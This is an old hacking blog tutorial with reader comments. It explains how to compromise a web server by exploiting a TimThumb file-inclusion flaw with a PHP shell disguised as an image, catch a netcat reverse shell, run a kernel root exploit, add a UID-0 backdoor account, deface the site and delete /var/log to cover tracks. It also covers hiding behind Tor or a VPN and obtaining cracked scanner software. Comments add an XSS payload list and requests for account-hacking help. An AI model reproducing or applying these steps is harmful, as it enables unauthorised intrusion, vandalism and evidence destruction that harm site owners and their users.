How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

Posted: 03/02/2012 in Hacking, Linux Hacking, Mac Hacking, Windows Hacking

Tutorial on Web Hacking by Akatzbreaker

Web-Hacking is a huge topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….

So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server

Everything you need to know….

Tools you need:

– Backtrack (Backtrack Website)

– Firefox (get it from here….) – Included in Backtrack and Ubuntu

– Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….

– iCon2PHP (Get it from here….)

– A good shell (iCon2PHP Archive includes three great shells)

– A good VPN or Tor (More explanation below…..)

– Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack

— Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.

(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)

Firefox

— Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….

Netcat

— Netcat is a powerful networking tool. You will need this to root the server….

iCon2PHP & Good Shells

— iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.

Good VPN or TOR (Proxies are good too…)

— While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.

What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account

Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.

                — If I listed the above options according to their reliability :                                 

1. Paid VPN Account at ProXPN

2. Tor

3. Free VPN Account at ProXPN

4. Proxy Connection

Acunetix Web Vulnerability Scanner

— Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.

The Consultant Edition (For unlimited websites) costs about 3000-7000$.

____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:

Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack

-Connect to your VPN or to Tor.

-It would be good to read a complete guide to stay anonymous while hacking here…

-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)

Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)

OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.

OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).

For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.

-It is hosted on a Unix System.

Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.

Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.

Run the Program and follow the in-program instructions to build the ‘finalImage.php’.

To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.

iCon2PHP Terminal Output:

[…]

Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php

Entered!

Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)

Go to the vulnerability and type at the URL:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.

What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s procceed to rooting….

Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:

netcat

4. Now type:

-l -n -v -p 402

5.It should have an output like this:

listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:

Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!

Downloading and Executing the Kernel exploit:

1. Now, if you type:

whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:

— The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)

(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))

— Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:

./exploit

6. Root permissions acquired! Type this to ensure:

id

or

whoami

7. Add a new root user:

adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:

passwd root1

SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.

First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:

/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short /var/log is the location where you should find all Linux logs file.

To delete all of them by once type:

su root1

rm -rf /var/log
mkdir /var/log

End of this Tutorial:

This was a great tutorial on Web-Hacking. I reasure you that more hacking tutorials are coming.
Great community about hacking at Hackforums.net

 

You can also check this Post out, if you like this Tutorial….

____________________________________________________________________

Akatzbreaker

Advertisements
Comments
    • gnahackteam says:

      DISCLAIMER:

      The above tutorial is for educational purposes only. It does NOT promote any damage to others work/property. It is your responsibility how to use the knowledge you get from this blog.

    • Dave Yang says:

      how can i get a good unzip shell for upload

  1. Its like you learn my mind! You appear to grasp a lot about this, like you wrote the book in it or something. I believe that you just could do with some percent to drive the message house a little bit, but instead of that, that is fantastic blog. A fantastic read. I’ll definitely be back.

  2. Hey There. I found your blog using msn. This is a really well written article. I’ll make sure to bookmark it and return to read more of How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks] G.N.A. Team . Thanks for the post. I’ll certainly return.

  3. It was excited to come across your site a short while ago. I arrived here today hoping to learn interesting things. I was not upset. Your well thought out ideas with new strategies on this subject matter were enlightening and a great help to me. Thank you for making time to create these things and for sharing your mind.

  4. I truly same when you plow this write of sundry internal your posts. Perhaps could you remain this?

  5. After examine a few of the blog posts on your website now, and I really like your means of blogging. I bookmarked it to my bookmark web site record and will likely be checking again soon. Pls check out my web page as nicely and let me know what you think.

  6. I might publish a post on how to root a remote Unix (Linux) machine if any Root Kernel Exploit is NOT available….

  7. sanam says:

    best article i have ever read.. thanks. and *thumbsup* for the great work

  8. I forgot to mention some things:
    + This exploit is successful because the uploaded image (or in this example: our Shell) is saved in the cache of WordPress. Thus we might need to go with our browser:
    http://www.site.com/blog/wp-content/themes/theme_name/scripts/cache/image.php;.png?

    In this way the shell will be executed (don’t forget the ? at the end)

    + You can use other methods to Root a Server (if a Local Root Kernel Exploit is not Available).
    Like Social-Engineering. (You don’t even need a tool, maybe some programming skills).

    I hope I solved some more Questions….

  9. If you like this Post, you will love this video on how to Hack a Server. In the video, an SQL Injection Vulnerability is exploited, and the shell is uploaded from an image Uploader on the Admin Panel. Then, the server is Rooted by a Public Local Root Exploit.

    The video link: http://youtu.be/tYD8JRG8JE4

    Credits to HaxOr for the HQ Video!

  10. You might also be interested in Web Application Firewall Bypassing: http://is.gd/FNyZLS

  11. If you like this Post, check this Tutorial out: http://is.gd/MPct4V

  12. Alexandra says:

    Oh my goodness! Impressive article dude! Thank you, However I am having problems with your
    RSS. I don’t know why I can’t join it. Is there anybody else
    getting similar RSS issues? Anyone who knows the answer will you kindly respond?

    Thanx!!

  13. Akshay says:

    G.N.A Hack Team- You guys won’t believe but i have been active on quite many forums, but there’s a remarkable spark in your tutorials. I mean if i have to say foolproof, tht wud be it. It’s an awesome way of understanding the reader and putting it across. Also, i wish to ask, whether is there any tutorial on how to upload shells on servers that simply ‘Rename your PHP’ file inspite of using tamper script or ‘Live HTTP Header’? Because although i am trying to upload my SHELL on sites, it just says, “Cannot read with error, or my file is not visible in their database or just renamed to .JPG. Any kinda help will be highly appreciated. Thanks guys! Awaiting for a prompt reply from your end.

  14. hacky says:

    The best tutOrIal i’ve ever seen!!!!!!!

  15. hackla4440 says:

    I love this tutorial could you please explain about ANONYMOUS surfing please or give me a tutorial and please help me via my email hackla4440@gmail.com

  16. […] this is just a copy-paste from https://gnahackteam.wordpress.com/2012/03/02/how-to-hack-a-server-shell-uploading-rooting-defacing-co… […]

  17. Ano2o00 says:

    This is also a nice and good Injector shell …http://pastebin.com/AZQnfmXH

  18. rajasekar says:

    I tried not working on local host

    localhost/wordpress/wp-content/themes/thesis/lib/scripts/thumb.php?src=http://localhost/iCon2PHP/image.php;.png

    Error Log

    Warning: imagecreatefrompng(): ‘C:/wamp/www///iCon2PHP/image.php;.png’ is not a valid PNG file in C:\wamp\www\wordpress\wp-content\themes\thesis\lib\scripts\thumb.php on line 248

    Can any one help me plz

  19. aman says:

    you followed a bottom to top approch..that is really appreciable…great to see that some blogs still providing stuff like this..keep it up.. 🙂

  20. It’s really a nice and useful piece of information. I am glad that you shared this helpful info with us. Please stay us informed like this. Thank you for sharing.

  21. how to use python file on windows?? please share me the tutor if u dont mind 🙂

  22. abhi says:

    exploit links are not working , please help

  23. richard says:

    i have a question, i read somewhere that you should upload a shell like this “http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?” just as an example, because if you upload it with a .php extention it wont work, i looked at how you did it with “image.php;.png” and wanted to ask is it true that you should upload the shell as a txt etc and also when i tested a shell on 000webhost as a txt it couldnt find the file could you tell me why and is that the right way to do it?

  24. Calvin says:

    Greetings! Very helpful advice in this particular article!
    It’s the little changes that will make the most important changes. Thanks for sharing!

  25. 49343 says:

    Great site from what I’ve seen thus far. My name’s Venetta
    and I’m very glad to view your site. In fact, I’d love to
    get in touch with you. Will you make sure you drop me a e-mai?

  26. anon says:

    i used a port scanner to see what ports i have open.. which is successful, but when i try back connect.. it doesnt connect at all? what did i do wrong?

  27. M says:

    hey im pleased to see a fellow revolutionary join us in legion against government mayhem shed wisdom fight for your knowledge stay enlighten .>M< p.s teach your wisdom to help us.

  28. Zack says:

    You jut taught a 14 yr old how to hack . Thanks!

  29. Right here is the perfect web site for anybody who wishes
    to understand this topic. You understand a whole lot its almost hard to argue with you (not that
    I really would want to…HaHa). You definitely put a new spin on a subject that’s been written about for years. Great stuff, just great!

  30. Very nice online site. Excellent weblog article in
    relation to How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks] | G.
    N.A. Team. You actually possess the approach for success materializing here.
    I will take note of your online site and come back later on.

  31. Je me nomme Marthe.
    Je suis une jeune fille de 40 printemps j’assume totalement mon age !
    je suis actuellement des études de hôtesse d’accueil .
    Je suis plutôt d’un naturel réservé.

  32. Ian Wykes, head of the Gold Exchange Rate Coast. ‘ In clinical trials of 1, 345 items have been worn. At the end of yesterday’s final gold exchange rate medal clash, which was then supposedly shipped off to
    Asia, according to Cosmetics Cop. As shown below going back more than 150 antioxidants tohelp the body fight of
    the free radicals that are hurting us all.

  33. noeladna says:

    this work is awesome…. i am still trying how to make my work a successful one…

  34. […] Posted: 03/02/2012 in Hacking, Linux Hacking, Mac Hacking, Windows Hacking 42 […]

  35. Eng Young says:

    Nice topic bro i have littel ques so
    1.i wanna create my own shell how to do
    2.when i create the shell how i can replace it in to index page to get access
    3.when i want to get or hack site.com/admin.php and put my hacking image what do i do
    sorry if i make you confuse thanks
    hope to help me

    • Lets start with the second question: you shouldn’t replace the index page with the shell. Otherwise everyone will have access to it. Even if it is password protected, it is going to be annoying!

      Also, to create a shell, you can change the code of an existing one. The most shells have the same functionalities. So why creating a new one? It is not worth spending the time…

      And for your laste question: it isn’t always possible to hack a page with an image…
      You can follow the instructions but they are for specific conditions

  36. Saurabh says:

    sucessfully uploaded the shell crreated from iCon2PHP .. however, http://sample.com/test/image.php;.png? does not show shell .. just the small image .. what am I doing wrong?
    output for both the following link is the same:
    http://sample.com/test/image.php;.png?

    advice

  37. Saurabh says:

    a little background:
    basically the vulnerable target has unauthenticated access through a misconfigured WebDav server.. I have created the shell as detailed above .. I have uploaded it to the directory … when I upload a clear picture I can see the image as part of the applicaiton .. but the shell is not executed..

  38. srsingh888@gmail.com says:

    It is simply a great tutorial and an eye opener for sys admins

  39. s3cg33k says:

    i’m not able to download Acunentix with crack could u share direct link or torrent to download is ! , if u can make it by email plz ,
    thanx for this great article

  40. Matiass says:

    6. Now, go to the Back-Connection function at the Shell.
    7. Complete with the following:

    I not understand this. Also after upload the shell.php;.png Im lost How does the shell recognises to send the comands. I uploaaded this to a pphoto uploader, can I do execution from there.

  41. What’s up mates, its fantastic piece of writing on the topic of teachingand entirely explained, keep it up all the time.

  42. Robert says:

    this tutorial is well written about how to hack a server plus uploading shell please i have a little bit problem there the part where you uploaded the shell to a free domain….and add it to your vulnerability website….that is not my major issue my problem here is that i trried to upload the image.php;.png to a website that i have its admin panel access but still i get error….then i tried it too with a vulnerabilty website and put in the link to my finallmage.php;.png but its still says error syntax i want you to explain more future from that part i understand every part of it but that main place is confusing.Please throw a little light to it for better understanding.Thanks

  43. Fragz says:

    Plz Can U teach me How To Hack A Fb Account i wanna hack my old Account which was hacked by somebody else!

  44. akon says:

    alert(Hacked)

  45. akon says:

    alert(“akon.banchood….. i am going to hack this website … I am using Proxy … dont even try to find me out “)

  46. akon says:

    “>alert(“XSS”)
    “>alert(String.fromCharCode(88,83,83))
    ‘>alert(“XSS”)
    ‘>alert(String.fromCharCode(88,83,83))
    aLeRT(“XSS”)
    <ScRIPt<aLeRT(String.fromCharCode(88,83,83))
    “>aLeRT(“XSS”)
    “><ScRIPt<aLeRT(String.fromCharCode(88,83,83))
    ‘>aLeRT(“XSS”)
    ‘><ScRIPt<aLeRT(String.fromCharCode(88,83,83))
    alert(“XSS”)
    alert(String.fromCharCode(88,83,83))
    “/>alert(“XSS”)
    “/>alert(String.fromCharCode(88,83,83))
    ‘/>alert(“XSS”)
    ‘/>alert(String.fromCharCode(88,83,83))
    “>alert(“XSS”)
    “>alert(String.fromCharCode(88,83,83))
    “>”>alert(“XSS”)
    “>’>alert(String.fromCharCode(88,83,83))
    “;alert(“XSS”);”
    “;alert(String.fromCharCode(88,83,83));”
    ‘;alert(“XSS”);’
    ‘;alert(String.fromCharCode(88,83,83));’
    “;alert(“XSS”)
    “;alert(String.fromCharCode(88,83,83))
    ‘;alert(“XSS”)
    ‘;alert(String.fromCharCode(88,83,83))

  47. Vishal SR says:

    hello i don’t even know the ‘H’ of hacking but i want to learn wht should i do will u train me, i just have the determination, thnx

  48. Heya i’m for the primary time here. I found this board annd I to
    find It truly useful & it helped me out much.

    I hope to offer one thing again and aid otheds such as you aided me.

  49. Yeѕ! Finally ѕomething aboput libres gratis.

  50. livres mobi says:

    Wonderful blog! Do you have any helpful hints for aspiring writers?
    I’m hoping to start my own blog soon but I’m a little lost on everything.
    Would you recommend starting with a free platform like WordPress or
    go for a paid option? There are so many options out there that
    I’m totally confused .. Any suggestions? Many thanks!

  51. Alp Fatih says:

    Great and detailed tutorial.

  52. Everything is very open with a clear clarification of the issues.
    It was truly informative. Your site is very useful. Thank you for sharing!

  53. I’ve been browsing online more than 2 hours today, yet I never found any
    interesting article like yours. It is pretty worth enough for me.
    Personally, if all webmasters and bloggers made good content as you
    did, the internet will be a lot more useful than ever before.

  54. Quality posts is the crucial to be a focus for the people to visit the
    web page, that’s what this web page is providing.

  55. These are actually impressive ideas in on the topic of blogging.
    You have touched some fastidious points here. Any way keep up wrinting.

  56. vade walez says:

    this is really great but i have a problem with installing back track,every time i try to install i get a black background,please illustrate me on how to install,i have been on this for three weeks now

  57. Johnd453 says:

    Thanks for the sensible critique. Me &amp my neighbor were just preparing to do a little research about this. We got a grab a book from our area library but I think I learned more clear from this post. I am very glad to see such wonderful info being shared freely out there. cgbdeeadaeea

  58. Scorpion says:

    Thanks Man…

  59. Scorpion says:

    Dude…

    How to find vulnerable site ???

    Is there type of dork for this ???????

  60. Kent says:

    The best tutorial i will ever seen
    I found this board and I to find It truly useful & it helped me out much.
    Great Post

  61. FOX says:

    alert(“hacked by libardo”);

  62. Rahul says:

    redserverhost.com

  63. hiiiiiiiiii………

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s